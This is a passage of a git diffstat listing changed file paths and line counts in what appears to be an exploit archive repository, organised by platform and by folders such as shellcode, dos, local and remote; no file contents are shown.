+- platforms/hp-ux/shellcode/13295.txt | 4 +- platforms/irix/local/1577.sh | 20 +- platforms/irix/local/265.sh | 6 +- platforms/irix/local/270.sh | 6 +- platforms/irix/local/334.c | 6 +- platforms/irix/local/336.c | 6 +- platforms/irix/local/337.c | 6 +- platforms/jsp/webapps/5112.txt | 112 +- platforms/lin_amd64/shellcode/13296.c | 168 +- platforms/lin_amd64/shellcode/13297.c | 248 +- platforms/lin_x86-64/shellcode/13463.c | 177 +- platforms/lin_x86-64/shellcode/13464.s | 56 +- platforms/lin_x86/shellcode/13307.c | 142 +- platforms/lin_x86/shellcode/13308.c | 250 +- platforms/lin_x86/shellcode/13309.asm | 158 +- platforms/lin_x86/shellcode/13310.c | 100 +- platforms/lin_x86/shellcode/13311.c | 116 +- platforms/lin_x86/shellcode/13312.c | 94 +- platforms/lin_x86/shellcode/13313.c | 264 +- platforms/lin_x86/shellcode/13314.c | 64 +- platforms/lin_x86/shellcode/13315.c | 114 +- platforms/lin_x86/shellcode/13316.c | 68 +- platforms/lin_x86/shellcode/13317.s | 226 +- platforms/lin_x86/shellcode/13318.s | 272 +- platforms/lin_x86/shellcode/13319.s | 214 +- platforms/lin_x86/shellcode/13320.c | 78 +- 
platforms/lin_x86/shellcode/13321.c | 182 +- platforms/lin_x86/shellcode/13322.c | 58 +- platforms/lin_x86/shellcode/13323.c | 178 +- platforms/lin_x86/shellcode/13324.c | 130 +- platforms/lin_x86/shellcode/13325.c | 108 +- platforms/lin_x86/shellcode/13326.c | 98 +- platforms/lin_x86/shellcode/13327.c | 84 +- platforms/lin_x86/shellcode/13328.c | 444 +- platforms/lin_x86/shellcode/13329.c | 190 +- platforms/lin_x86/shellcode/13330.c | 206 +- platforms/lin_x86/shellcode/13331.c | 140 +- platforms/lin_x86/shellcode/13332.c | 106 +- platforms/lin_x86/shellcode/13333.txt | 112 +- platforms/lin_x86/shellcode/13334.txt | 106 +- platforms/lin_x86/shellcode/13335.c | 84 +- platforms/lin_x86/shellcode/13336.c | 78 +- platforms/lin_x86/shellcode/13337.c | 270 +- platforms/lin_x86/shellcode/13338.c | 86 +- platforms/lin_x86/shellcode/13339.asm | 384 +- platforms/lin_x86/shellcode/13340.c | 250 +- platforms/lin_x86/shellcode/13341.c | 146 +- platforms/lin_x86/shellcode/13342.c | 108 +- platforms/lin_x86/shellcode/13343.asm | 396 +- platforms/lin_x86/shellcode/13344.c | 88 +- platforms/lin_x86/shellcode/13345.c | 60 +- platforms/lin_x86/shellcode/13346.s | 152 +- platforms/lin_x86/shellcode/13347.c | 88 +- platforms/lin_x86/shellcode/13348.c | 76 +- platforms/lin_x86/shellcode/13350.c | 84 +- platforms/lin_x86/shellcode/13351.c | 48 +- platforms/lin_x86/shellcode/13352.c | 98 +- platforms/lin_x86/shellcode/13353.c | 86 +- platforms/lin_x86/shellcode/13354.c | 80 +- platforms/lin_x86/shellcode/13355.c | 254 +- platforms/lin_x86/shellcode/13356.c | 102 +- platforms/lin_x86/shellcode/13357.c | 110 +- platforms/lin_x86/shellcode/13358.c | 64 +- platforms/lin_x86/shellcode/13359.c | 82 +- platforms/lin_x86/shellcode/13360.c | 216 +- platforms/lin_x86/shellcode/13361.c | 196 +- platforms/lin_x86/shellcode/13362.c | 130 +- platforms/lin_x86/shellcode/13363.c | 322 +- platforms/lin_x86/shellcode/13364.c | 266 +- platforms/lin_x86/shellcode/13365.c | 62 +- 
platforms/lin_x86/shellcode/13367.c | 82 +- platforms/lin_x86/shellcode/13368.c | 84 +- platforms/lin_x86/shellcode/13369.c | 86 +- platforms/lin_x86/shellcode/13370.c | 84 +- platforms/lin_x86/shellcode/13371.c | 222 +- platforms/lin_x86/shellcode/13372.c | 210 +- platforms/lin_x86/shellcode/13373.c | 270 +- platforms/lin_x86/shellcode/13374.c | 170 +- platforms/lin_x86/shellcode/13375.c | 56 +- platforms/lin_x86/shellcode/13376.c | 60 +- platforms/lin_x86/shellcode/13377.c | 66 +- platforms/lin_x86/shellcode/13378.c | 76 +- platforms/lin_x86/shellcode/13379.c | 68 +- platforms/lin_x86/shellcode/13380.c | 280 +- platforms/lin_x86/shellcode/13381.c | 448 +- platforms/lin_x86/shellcode/13382.c | 154 +- platforms/lin_x86/shellcode/13383.c | 82 +- platforms/lin_x86/shellcode/13384.c | 66 +- platforms/lin_x86/shellcode/13385.c | 80 +- platforms/lin_x86/shellcode/13386.c | 106 +- platforms/lin_x86/shellcode/13387.c | 140 +- platforms/lin_x86/shellcode/13388.c | 184 +- platforms/lin_x86/shellcode/13389.c | 68 +- platforms/lin_x86/shellcode/13390.c | 60 +- platforms/lin_x86/shellcode/13391.c | 84 +- platforms/lin_x86/shellcode/13392.c | 52 +- platforms/lin_x86/shellcode/13393.c | 128 +- platforms/lin_x86/shellcode/13395.c | 88 +- platforms/lin_x86/shellcode/13396.c | 32 +- platforms/lin_x86/shellcode/13397.c | 40 +- platforms/lin_x86/shellcode/13398.c | 58 +- platforms/lin_x86/shellcode/13399.c | 50 +- platforms/lin_x86/shellcode/13400.c | 128 +- platforms/lin_x86/shellcode/13401.c | 100 +- platforms/lin_x86/shellcode/13402.c | 140 +- platforms/lin_x86/shellcode/13403.c | 56 +- platforms/lin_x86/shellcode/13404.c | 106 +- platforms/lin_x86/shellcode/13405.c | 44 +- platforms/lin_x86/shellcode/13406.c | 76 +- platforms/lin_x86/shellcode/13408.c | 318 +- platforms/lin_x86/shellcode/13409.c | 120 +- platforms/lin_x86/shellcode/13410.s | 640 +- platforms/lin_x86/shellcode/13411.c | 4 +- platforms/lin_x86/shellcode/13412.c | 4 +- platforms/lin_x86/shellcode/13413.c | 4 +- 
platforms/lin_x86/shellcode/13414.c | 4 +- platforms/lin_x86/shellcode/13416.txt | 4 +- platforms/lin_x86/shellcode/13417.c | 4 +- platforms/lin_x86/shellcode/13418.c | 4 +- platforms/lin_x86/shellcode/13419.c | 4 +- platforms/lin_x86/shellcode/13420.c | 4 +- platforms/lin_x86/shellcode/13421.c | 4 +- platforms/lin_x86/shellcode/13422.c | 4 +- platforms/lin_x86/shellcode/13423.c | 4 +- platforms/lin_x86/shellcode/13424.txt | 4 +- platforms/lin_x86/shellcode/13425.c | 4 +- platforms/lin_x86/shellcode/13426.c | 4 +- platforms/lin_x86/shellcode/13427.c | 4 +- platforms/lin_x86/shellcode/13428.c | 4 +- platforms/lin_x86/shellcode/13429.c | 4 +- platforms/lin_x86/shellcode/13430.c | 4 +- platforms/lin_x86/shellcode/13431.c | 4 +- platforms/lin_x86/shellcode/13432.c | 4 +- platforms/lin_x86/shellcode/13433.c | 4 +- platforms/lin_x86/shellcode/13434.c | 4 +- platforms/lin_x86/shellcode/13435.c | 4 +- platforms/lin_x86/shellcode/13436.c | 4 +- platforms/lin_x86/shellcode/13437.c | 4 +- platforms/lin_x86/shellcode/13438.c | 4 +- platforms/lin_x86/shellcode/13439.c | 4 +- platforms/lin_x86/shellcode/13440.c | 4 +- platforms/lin_x86/shellcode/13441.c | 4 +- platforms/lin_x86/shellcode/13442.c | 4 +- platforms/lin_x86/shellcode/13443.c | 4 +- platforms/lin_x86/shellcode/13444.c | 4 +- platforms/lin_x86/shellcode/13445.c | 4 +- platforms/lin_x86/shellcode/13446.c | 4 +- platforms/lin_x86/shellcode/13447.c | 4 +- platforms/lin_x86/shellcode/13448.c | 4 +- platforms/lin_x86/shellcode/13449.c | 4 +- platforms/lin_x86/shellcode/13450.c | 4 +- platforms/lin_x86/shellcode/13451.c | 4 +- platforms/lin_x86/shellcode/13452.c | 4 +- platforms/lin_x86/shellcode/13453.c | 4 +- platforms/lin_x86/shellcode/13454.c | 4 +- platforms/lin_x86/shellcode/13455.c | 4 +- platforms/lin_x86/shellcode/13456.c | 4 +- platforms/lin_x86/shellcode/13457.c | 4 +- platforms/lin_x86/shellcode/13458.c | 4 +- platforms/lin_x86/shellcode/13459.c | 4 +- platforms/lin_x86/shellcode/13460.c | 4 +- 
platforms/lin_x86/shellcode/13461.c | 4 +- platforms/lin_x86/shellcode/13462.c | 4 +- platforms/linux/dos/1196.c | 6 +- platforms/linux/dos/1634.pl | 188 +- platforms/linux/dos/1641.pl | 768 +- platforms/linux/dos/1657.asm | 88 +- platforms/linux/dos/1746.pl | 52 +- platforms/linux/dos/1815.c | 212 +- platforms/linux/dos/185.sh | 6 +- platforms/linux/dos/1852.c | 190 +- platforms/linux/dos/1894.py | 166 +- platforms/linux/dos/2051.py | 594 +- platforms/linux/dos/236.sh | 6 +- platforms/linux/dos/238.c | 6 +- platforms/linux/dos/251.c | 6 +- platforms/linux/dos/274.c | 6 +- platforms/linux/dos/2892.py | 84 +- platforms/linux/dos/2893.py | 114 +- platforms/linux/dos/2954.html | 72 +- platforms/linux/dos/3023.c | 176 +- platforms/linux/dos/306.c | 6 +- platforms/linux/dos/3396.php | 112 +- platforms/linux/dos/3415.html | 56 +- platforms/linux/dos/3441.c | 84 +- platforms/linux/dos/3586.php | 84 +- platforms/linux/dos/370.c | 6 +- platforms/linux/dos/3769.c | 280 +- platforms/linux/dos/3807.c | 308 +- platforms/linux/dos/4216.pl | 76 +- platforms/linux/dos/4347.pl | 286 +- platforms/linux/dos/4532.pl | 170 +- platforms/linux/dos/4535.pl | 158 +- platforms/linux/dos/4600.py | 76 +- platforms/linux/dos/4732.c | 458 +- platforms/linux/dos/5210.c | 228 +- platforms/linux/dos/5307.pl | 262 +- platforms/linux/dos/5458.txt | 58 +- platforms/linux/dos/551.c | 6 +- platforms/linux/dos/5561.pl | 46 +- platforms/linux/dos/5585.pl | 190 +- platforms/linux/dos/5814.pl | 70 +- platforms/linux/dos/6689.txt | 192 +- platforms/linux/dos/6704.txt | 24 +- platforms/linux/dos/6718.html | 20 +- platforms/linux/dos/7091.c | 244 +- platforms/linux/dos/7100.pl | 122 +- platforms/linux/dos/7150.html | 52 +- platforms/linux/dos/815.c | 6 +- platforms/linux/dos/8205.pl | 152 +- platforms/linux/dos/8469.c | 6416 ++++---- platforms/linux/dos/8544.pl | 116 +- platforms/linux/dos/8960.py | 160 +- platforms/linux/dos/8982.txt | 40 +- platforms/linux/dos/904.c | 6 +- platforms/linux/dos/911.c | 6 +- 
platforms/linux/dos/9265.c | 616 +- platforms/linux/dos/9442.c | 352 +- platforms/linux/dos/957.c | 6 +- platforms/linux/dos/958.c | 6 +- platforms/linux/dos/959.c | 6 +- platforms/linux/dos/998.c | 6 +- platforms/linux/dos/999.c | 6 +- platforms/linux/local/1009.c | 6 +- platforms/linux/local/1029.c | 6 +- platforms/linux/local/106.c | 6 +- platforms/linux/local/1154.pl | 6 +- platforms/linux/local/1170.c | 6 +- platforms/linux/local/1181.c | 6 +- platforms/linux/local/1187.c | 6 +- platforms/linux/local/1215.c | 110 +- platforms/linux/local/1297.py | 478 +- platforms/linux/local/1299.sh | 74 +- platforms/linux/local/1300.sh | 214 +- platforms/linux/local/1316.pl | 132 +- platforms/linux/local/1412.rb | 68 +- platforms/linux/local/1415.c | 196 +- platforms/linux/local/1425.c | 224 +- platforms/linux/local/144.c | 6 +- platforms/linux/local/1445.c | 204 +- platforms/linux/local/1449.c | 106 +- platforms/linux/local/1579.pl | 124 +- platforms/linux/local/1591.py | 94 +- platforms/linux/local/178.c | 6 +- platforms/linux/local/180.c | 6 +- platforms/linux/local/182.sh | 8 +- platforms/linux/local/183.c | 6 +- platforms/linux/local/184.pl | 6 +- platforms/linux/local/186.pl | 6 +- platforms/linux/local/193.sh | 6 +- platforms/linux/local/2016.sh | 24 +- platforms/linux/local/203.sh | 6 +- platforms/linux/local/206.c | 6 +- platforms/linux/local/209.c | 6 +- platforms/linux/local/2144.sh | 52 +- platforms/linux/local/215.c | 6 +- platforms/linux/local/217.c | 6 +- platforms/linux/local/218.c | 6 +- platforms/linux/local/219.c | 6 +- platforms/linux/local/2193.php | 274 +- platforms/linux/local/221.c | 6 +- platforms/linux/local/222.c | 6 +- platforms/linux/local/229.c | 6 +- platforms/linux/local/231.sh | 6 +- platforms/linux/local/2338.c | 250 +- platforms/linux/local/2404.c | 416 +- platforms/linux/local/2466.pl | 82 +- platforms/linux/local/249.c | 6 +- platforms/linux/local/2492.s | 658 +- platforms/linux/local/255.pl | 6 +- platforms/linux/local/257.pl | 6 +- 
platforms/linux/local/2581.c | 688 +- platforms/linux/local/273.c | 6 +- platforms/linux/local/285.c | 6 +- platforms/linux/local/290.sh | 6 +- platforms/linux/local/317.txt | 6 +- platforms/linux/local/320.pl | 6 +- platforms/linux/local/3213.c | 310 +- platforms/linux/local/322.c | 6 +- platforms/linux/local/325.c | 6 +- platforms/linux/local/331.c | 6 +- platforms/linux/local/3356.sh | 390 +- platforms/linux/local/3384.c | 62 +- platforms/linux/local/339.c | 6 +- platforms/linux/local/3426.php | 188 +- platforms/linux/local/3427.php | 136 +- platforms/linux/local/3440.php | 94 +- platforms/linux/local/3479.php | 308 +- platforms/linux/local/3480.php | 318 +- platforms/linux/local/3499.php | 106 +- platforms/linux/local/3525.php | 352 +- platforms/linux/local/3529.php | 266 +- platforms/linux/local/3571.php | 86 +- platforms/linux/local/3572.php | 224 +- platforms/linux/local/369.pl | 6 +- platforms/linux/local/375.c | 6 +- platforms/linux/local/393.c | 6 +- platforms/linux/local/4028.txt | 128 +- platforms/linux/local/417.c | 6 +- platforms/linux/local/434.sh | 6 +- platforms/linux/local/438.c | 6 +- platforms/linux/local/4460.c | 278 +- platforms/linux/local/466.pl | 6 +- platforms/linux/local/469.c | 6 +- platforms/linux/local/4698.c | 116 +- platforms/linux/local/470.c | 6 +- platforms/linux/local/4756.c | 335 +- platforms/linux/local/476.c | 6 +- platforms/linux/local/479.c | 6 +- platforms/linux/local/5092.c | 578 +- platforms/linux/local/5093.c | 294 +- platforms/linux/local/586.c | 6 +- platforms/linux/local/587.c | 6 +- platforms/linux/local/591.c | 6 +- platforms/linux/local/600.c | 6 +- platforms/linux/local/601.c | 6 +- platforms/linux/local/6032.py | 1100 +- platforms/linux/local/624.c | 6 +- platforms/linux/local/657.c | 6 +- platforms/linux/local/669.c | 6 +- platforms/linux/local/6851.c | 176 +- platforms/linux/local/695.c | 6 +- platforms/linux/local/71.c | 6 +- platforms/linux/local/7177.c | 602 +- platforms/linux/local/7313.sh | 196 +- 
platforms/linux/local/7393.txt | 231 +- platforms/linux/local/741.pl | 6 +- platforms/linux/local/7681.txt | 54 +- platforms/linux/local/776.c | 6 +- platforms/linux/local/796.sh | 92 +- platforms/linux/local/816.c | 6 +- platforms/linux/local/824.c | 6 +- platforms/linux/local/8303.c | 326 +- platforms/linux/local/8369.sh | 206 +- platforms/linux/local/8470.py | 430 +- platforms/linux/local/8534.c | 374 +- platforms/linux/local/876.c | 6 +- platforms/linux/local/877.pl | 6 +- platforms/linux/local/890.pl | 6 +- platforms/linux/local/895.c | 6 +- platforms/linux/local/913.pl | 6 +- platforms/linux/local/9135.sh | 64 +- platforms/linux/local/914.c | 6 +- platforms/linux/local/924.c | 6 +- platforms/linux/local/9302.py | 82 +- platforms/linux/local/950.c | 6 +- platforms/linux/local/9595.c | 162 +- platforms/linux/local/9608.c | 274 +- platforms/linux/local/973.c | 6 +- platforms/linux/local/974.pl | 6 +- platforms/linux/local/997.sh | 6 +- platforms/linux/remote/102.c | 6 +- platforms/linux/remote/1021.c | 6 +- platforms/linux/remote/1038.c | 6 +- platforms/linux/remote/1047.pl | 6 +- platforms/linux/remote/1055.c | 6 +- platforms/linux/remote/1123.c | 6 +- platforms/linux/remote/1138.c | 6 +- platforms/linux/remote/1139.c | 6 +- platforms/linux/remote/1171.c | 6 +- platforms/linux/remote/1209.c | 6 +- platforms/linux/remote/1232.c | 510 +- platforms/linux/remote/1238.c | 94 +- platforms/linux/remote/1242.pl | 282 +- platforms/linux/remote/1247.pl | 444 +- platforms/linux/remote/126.c | 6 +- platforms/linux/remote/1272.c | 838 +- platforms/linux/remote/1288.pl | 410 +- platforms/linux/remote/1290.pl | 358 +- platforms/linux/remote/1291.pl | 222 +- platforms/linux/remote/1314.rb | 170 +- platforms/linux/remote/1355.pl | 96 +- platforms/linux/remote/1456.c | 738 +- platforms/linux/remote/1474.pm | 546 +- platforms/linux/remote/1486.c | 726 +- platforms/linux/remote/1487.c | 694 +- platforms/linux/remote/1574.c | 562 +- platforms/linux/remote/1578.c | 268 +- 
platforms/linux/remote/167.c | 6 +- platforms/linux/remote/1717.c | 550 +- platforms/linux/remote/173.pl | 6 +- platforms/linux/remote/174.c | 6 +- platforms/linux/remote/1741.c | 802 +- platforms/linux/remote/1742.c | 454 +- platforms/linux/remote/1750.c | 490 +- platforms/linux/remote/181.c | 6 +- platforms/linux/remote/2185.pl | 124 +- platforms/linux/remote/220.c | 6 +- platforms/linux/remote/225.c | 6 +- platforms/linux/remote/226.c | 6 +- platforms/linux/remote/227.c | 6 +- platforms/linux/remote/2274.c | 552 +- platforms/linux/remote/230.c | 6 +- platforms/linux/remote/237.c | 6 +- platforms/linux/remote/27.pl | 6 +- platforms/linux/remote/277.c | 6 +- platforms/linux/remote/279.c | 6 +- platforms/linux/remote/282.c | 6 +- platforms/linux/remote/2933.c | 762 +- platforms/linux/remote/2959.sql | 154 +- platforms/linux/remote/296.c | 6 +- platforms/linux/remote/303.pl | 6 +- platforms/linux/remote/307.py | 6 +- platforms/linux/remote/308.c | 6 +- platforms/linux/remote/3099.pm | 248 +- platforms/linux/remote/3329.c | 494 +- platforms/linux/remote/3389.c | 774 +- platforms/linux/remote/340.c | 6 +- platforms/linux/remote/346.c | 6 +- platforms/linux/remote/347.c | 6 +- platforms/linux/remote/348.c | 6 +- platforms/linux/remote/359.c | 6 +- platforms/linux/remote/3609.py | 172 +- platforms/linux/remote/3615.c | 602 +- platforms/linux/remote/3698.txt | 290 +- platforms/linux/remote/372.c | 6 +- platforms/linux/remote/373.c | 6 +- platforms/linux/remote/3787.c | 732 +- platforms/linux/remote/379.txt | 6 +- platforms/linux/remote/380.c | 6 +- platforms/linux/remote/3815.c | 740 +- platforms/linux/remote/382.c | 6 +- platforms/linux/remote/386.c | 6 +- platforms/linux/remote/387.c | 6 +- platforms/linux/remote/389.c | 6 +- platforms/linux/remote/39.c | 6 +- platforms/linux/remote/390.c | 6 +- platforms/linux/remote/397.c | 6 +- platforms/linux/remote/398.c | 6 +- platforms/linux/remote/399.c | 6 +- platforms/linux/remote/405.c | 6 +- platforms/linux/remote/408.c | 6 
+- platforms/linux/remote/4087.c | 316 +- platforms/linux/remote/416.c | 6 +- platforms/linux/remote/4162.c | 822 +- platforms/linux/remote/424.c | 6 +- platforms/linux/remote/4315.py | 4 +- platforms/linux/remote/4362.pl | 44 +- platforms/linux/remote/437.c | 6 +- platforms/linux/remote/4437.c | 1082 +- platforms/linux/remote/4478.c | 552 +- platforms/linux/remote/4514.c | 272 +- platforms/linux/remote/4533.c | 440 +- platforms/linux/remote/4534.c | 596 +- platforms/linux/remote/4541.c | 772 +- platforms/linux/remote/4542.py | 60 +- platforms/linux/remote/4552.pl | 172 +- platforms/linux/remote/46.c | 6 +- platforms/linux/remote/4862.py | 146 +- platforms/linux/remote/49.c | 6 +- platforms/linux/remote/4947.c | 296 +- platforms/linux/remote/5224.php | 3128 ++-- platforms/linux/remote/5283.txt | 94 +- platforms/linux/remote/58.c | 6 +- platforms/linux/remote/580.c | 6 +- platforms/linux/remote/608.c | 6 +- platforms/linux/remote/6094.txt | 48 +- platforms/linux/remote/620.c | 6 +- platforms/linux/remote/652.c | 6 +- platforms/linux/remote/660.c | 6 +- platforms/linux/remote/7151.c | 552 +- platforms/linux/remote/7183.txt | 206 +- platforms/linux/remote/806.c | 6 +- platforms/linux/remote/812.c | 6 +- platforms/linux/remote/826.c | 6 +- platforms/linux/remote/831.c | 6 +- platforms/linux/remote/8384.txt | 374 +- platforms/linux/remote/84.c | 6 +- platforms/linux/remote/8569.txt | 78 +- platforms/linux/remote/8570.txt | 62 +- platforms/linux/remote/878.c | 6 +- platforms/linux/remote/8880.txt | 1442 +- platforms/linux/remote/900.c | 6 +- platforms/linux/remote/902.c | 6 +- platforms/linux/remote/903.c | 6 +- platforms/linux/remote/9143.txt | 230 +- platforms/linux/remote/915.c | 6 +- platforms/linux/remote/934.c | 6 +- platforms/linux/remote/940.c | 6 +- platforms/linux/remote/970.c | 6 +- platforms/linux/remote/981.c | 6 +- platforms/linux/remote/99.c | 6 +- platforms/linux_mips/shellcode/13298.c | 182 +- platforms/linux_mips/shellcode/13299.c | 76 +- 
platforms/linux_mips/shellcode/13300.c | 60 +- platforms/linux_ppc/shellcode/13301.c | 54 +- platforms/linux_ppc/shellcode/13302.c | 40 +- platforms/linux_ppc/shellcode/13303.c | 162 +- platforms/linux_ppc/shellcode/13304.c | 4 +- platforms/linux_sparc/shellcode/13305.c | 4 +- platforms/linux_sparc/shellcode/13306.c | 4 +- platforms/minix/dos/6120.txt | 56 +- platforms/minix/dos/6129.txt | 42 +- platforms/multiple/dos/1008.c | 6 +- platforms/multiple/dos/1037.c | 6 +- platforms/multiple/dos/1056.pl | 6 +- platforms/multiple/dos/1176.c | 6 +- platforms/multiple/dos/1204.html | 5 +- platforms/multiple/dos/1213.c | 7 +- platforms/multiple/dos/1254.html | 22 +- platforms/multiple/dos/1256.pl | 222 +- platforms/multiple/dos/1268.pl | 282 +- platforms/multiple/dos/1331.c | 182 +- platforms/multiple/dos/1390.c | 732 +- platforms/multiple/dos/1489.pl | 92 +- platforms/multiple/dos/1572.pl | 128 +- platforms/multiple/dos/1671.c | 520 +- platforms/multiple/dos/1819.txt | 158 +- platforms/multiple/dos/1937.html | 4 +- platforms/multiple/dos/1947.c | 180 +- platforms/multiple/dos/1972.txt | 56 +- platforms/multiple/dos/2073.c | 302 +- platforms/multiple/dos/2179.c | 214 +- platforms/multiple/dos/2180.py | 306 +- platforms/multiple/dos/2303.html | 68 +- platforms/multiple/dos/2444.sh | 244 +- platforms/multiple/dos/2515.txt | 74 +- platforms/multiple/dos/2586.pl | 376 +- platforms/multiple/dos/2597.pl | 60 +- platforms/multiple/dos/2857.php | 54 +- platforms/multiple/dos/2947.pl | 126 +- platforms/multiple/dos/3101.py | 1118 +- platforms/multiple/dos/3362.py | 152 +- platforms/multiple/dos/3394.php | 142 +- platforms/multiple/dos/3404.php | 62 +- platforms/multiple/dos/3407.c | 252 +- platforms/multiple/dos/3434.c | 584 +- platforms/multiple/dos/3566.pl | 42 +- platforms/multiple/dos/3709.html | 38 +- platforms/multiple/dos/3726.c | 380 +- platforms/multiple/dos/3784.c | 226 +- platforms/multiple/dos/3851.c | 330 +- platforms/multiple/dos/3871.html | 102 +- 
platforms/multiple/dos/4038.pl | 278 +- platforms/multiple/dos/4175.php | 46 +- platforms/multiple/dos/4181.php | 72 +- platforms/multiple/dos/4196.c | 362 +- platforms/multiple/dos/4249.rb | 342 +- platforms/multiple/dos/4260.php | 48 +- platforms/multiple/dos/4432.html | 40 +- platforms/multiple/dos/4540.pl | 60 +- platforms/multiple/dos/4615.txt | 60 +- platforms/multiple/dos/4648.py | 150 +- platforms/multiple/dos/4856.php | 374 +- platforms/multiple/dos/4997.sql | 112 +- platforms/multiple/dos/5268.html | 78 +- platforms/multiple/dos/5306.txt | 78 +- platforms/multiple/dos/5679.php | 158 +- platforms/multiple/dos/5712.pl | 46 +- platforms/multiple/dos/5749.pl | 90 +- platforms/multiple/dos/6046.txt | 182 +- platforms/multiple/dos/6218.txt | 802 +- platforms/multiple/dos/6239.txt | 176 +- platforms/multiple/dos/6293.txt | 226 +- platforms/multiple/dos/6471.pl | 76 +- platforms/multiple/dos/6805.txt | 512 +- platforms/multiple/dos/7330.c | 180 +- platforms/multiple/dos/7467.txt | 58 +- platforms/multiple/dos/7520.c | 170 +- platforms/multiple/dos/7555.py | 46 +- platforms/multiple/dos/7564.pl | 114 +- platforms/multiple/dos/7643.txt | 66 +- platforms/multiple/dos/7647.txt | 156 +- platforms/multiple/dos/7673.html | 274 +- platforms/multiple/dos/7685.pl | 76 +- platforms/multiple/dos/7785.py | 56 +- platforms/multiple/dos/7812.pl | 98 +- platforms/multiple/dos/8091.html | 14 +- platforms/multiple/dos/8148.pl | 132 +- platforms/multiple/dos/8219.html | 20 +- platforms/multiple/dos/8241.txt | 254 +- platforms/multiple/dos/8245.c | 182 +- platforms/multiple/dos/8308.c | 88 +- platforms/multiple/dos/8320.py | 129 +- platforms/multiple/dos/8337.c | 758 +- platforms/multiple/dos/838.pl | 6 +- platforms/multiple/dos/8429.pl | 50 +- platforms/multiple/dos/855.pl | 6 +- platforms/multiple/dos/8646.php | 92 +- platforms/multiple/dos/8669.c | 284 +- platforms/multiple/dos/8695.txt | 120 +- platforms/multiple/dos/8720.c | 288 +- platforms/multiple/dos/8794.htm | 200 +- 
platforms/multiple/dos/880.pl | 6 +- platforms/multiple/dos/8822.txt | 240 +- platforms/multiple/dos/8873.c | 184 +- platforms/multiple/dos/8940.pl | 1020 +- platforms/multiple/dos/8957.txt | 260 +- platforms/multiple/dos/9071.txt | 168 +- platforms/multiple/dos/9160.txt | 296 +- platforms/multiple/dos/9175.txt | 162 +- platforms/multiple/dos/9198.txt | 646 +- platforms/multiple/dos/9323.txt | 68 +- platforms/multiple/dos/946.c | 6 +- platforms/multiple/dos/956.c | 6 +- platforms/multiple/dos/984.c | 6 +- platforms/multiple/local/1119.txt | 6 +- platforms/multiple/local/1554.c | 270 +- platforms/multiple/local/1719.txt | 120 +- platforms/multiple/local/1924.txt | 112 +- platforms/multiple/local/288.c | 6 +- platforms/multiple/local/3177.txt | 92 +- platforms/multiple/local/3178.txt | 84 +- platforms/multiple/local/3179.txt | 84 +- platforms/multiple/local/321.c | 6 +- platforms/multiple/local/3413.php | 112 +- platforms/multiple/local/3414.php | 98 +- platforms/multiple/local/3424.php | 138 +- platforms/multiple/local/3442.php | 172 +- platforms/multiple/local/3559.php | 112 +- platforms/multiple/local/4392.txt | 159 +- platforms/multiple/local/4564.txt | 138 +- platforms/multiple/local/4570.pl | 226 +- platforms/multiple/local/4571.pl | 254 +- platforms/multiple/local/4572.txt | 100 +- platforms/multiple/local/4994.sql | 102 +- platforms/multiple/local/4995.sql | 102 +- platforms/multiple/local/4996.sql | 102 +- platforms/multiple/local/629.c | 6 +- platforms/multiple/local/7171.txt | 186 +- platforms/multiple/local/7503.txt | 46 +- platforms/multiple/local/7646.txt | 752 +- platforms/multiple/local/7675.txt | 150 +- platforms/multiple/local/7676.txt | 140 +- platforms/multiple/local/7677.txt | 264 +- platforms/multiple/local/8456.txt | 152 +- platforms/multiple/local/8641.txt | 110 +- platforms/multiple/local/9072.txt | 112 +- platforms/multiple/local/9520.txt | 186 +- platforms/multiple/remote/1007.html | 14 +- platforms/multiple/remote/1188.c | 6 +- 
platforms/multiple/remote/1263.pl | 306 +- platforms/multiple/remote/1292.pm | 296 +- platforms/multiple/remote/201.c | 6 +- platforms/multiple/remote/2053.rb | 174 +- platforms/multiple/remote/2061.txt | 46 +- platforms/multiple/remote/2784.html | 108 +- platforms/multiple/remote/2837.sql | 200 +- platforms/multiple/remote/300.c | 6 +- platforms/multiple/remote/3064.rb | 124 +- platforms/multiple/remote/311.pl | 6 +- platforms/multiple/remote/3269.pl | 240 +- platforms/multiple/remote/3303.sh | 174 +- platforms/multiple/remote/3358.pl | 250 +- platforms/multiple/remote/3359.pl | 250 +- platforms/multiple/remote/3363.pl | 244 +- platforms/multiple/remote/3405.txt | 36 +- platforms/multiple/remote/3425.txt | 96 +- platforms/multiple/remote/3452.php | 108 +- platforms/multiple/remote/3585.pl | 224 +- platforms/multiple/remote/3654.pl | 330 +- platforms/multiple/remote/39569.py | 498 + platforms/multiple/remote/4093.pl | 190 +- platforms/multiple/remote/4391.c | 288 +- platforms/multiple/remote/4399.html | 28 +- platforms/multiple/remote/4530.pl | 158 +- platforms/multiple/remote/4556.txt | 150 +- platforms/multiple/remote/4761.pl | 56 +- platforms/multiple/remote/5215.txt | 222 +- platforms/multiple/remote/5430.txt | 302 +- platforms/multiple/remote/5534.txt | 302 +- platforms/multiple/remote/6122.rb | 944 +- platforms/multiple/remote/6123.py | 224 +- platforms/multiple/remote/6130.c | 728 +- platforms/multiple/remote/689.pl | 6 +- platforms/multiple/remote/7760.php | 276 +- platforms/multiple/remote/7781.txt | 274 +- platforms/multiple/remote/805.c | 6 +- platforms/multiple/remote/8097.txt | 28 +- platforms/multiple/remote/8191.txt | 160 +- platforms/multiple/remote/8458.txt | 174 +- platforms/multiple/remote/86.c | 6 +- platforms/multiple/remote/8786.txt | 140 +- platforms/multiple/remote/879.pl | 6 +- platforms/multiple/remote/8907.txt | 84 +- platforms/multiple/remote/9651.txt | 134 +- platforms/multiple/shellcode/13465.c | 152 +- 
platforms/multiple/shellcode/13466.c | 122 +- platforms/multiple/shellcode/13467.c | 4 +- platforms/multiple/shellcode/13468.c | 4 +- platforms/multiple/shellcode/13469.c | 4 +- platforms/multiple/webapps/14606.html | 4 +- platforms/netbsd_x86/shellcode/13471.c | 140 +- platforms/netbsd_x86/shellcode/13472.c | 72 +- platforms/netbsd_x86/shellcode/13473.c | 68 +- platforms/netbsd_x86/shellcode/13474.txt | 4 +- platforms/novell/dos/264.c | 6 +- platforms/novell/remote/1679.pm | 245 +- platforms/openbsd/dos/8406.txt | 122 +- platforms/openbsd/dos/8430.py | 18 +- platforms/openbsd/local/5979.c | 488 +- platforms/openbsd_x86/shellcode/13475.c | 126 +- platforms/openbsd_x86/shellcode/13476.c | 4 +- platforms/openbsd_x86/shellcode/13477.c | 4 +- platforms/osx/dos/1712.html | 152 +- platforms/osx/dos/1715.html | 76 +- platforms/osx/dos/3069.pl | 82 +- platforms/osx/dos/3080.rb | 90 +- platforms/osx/dos/3098.html | 44 +- platforms/osx/dos/3110.rb | 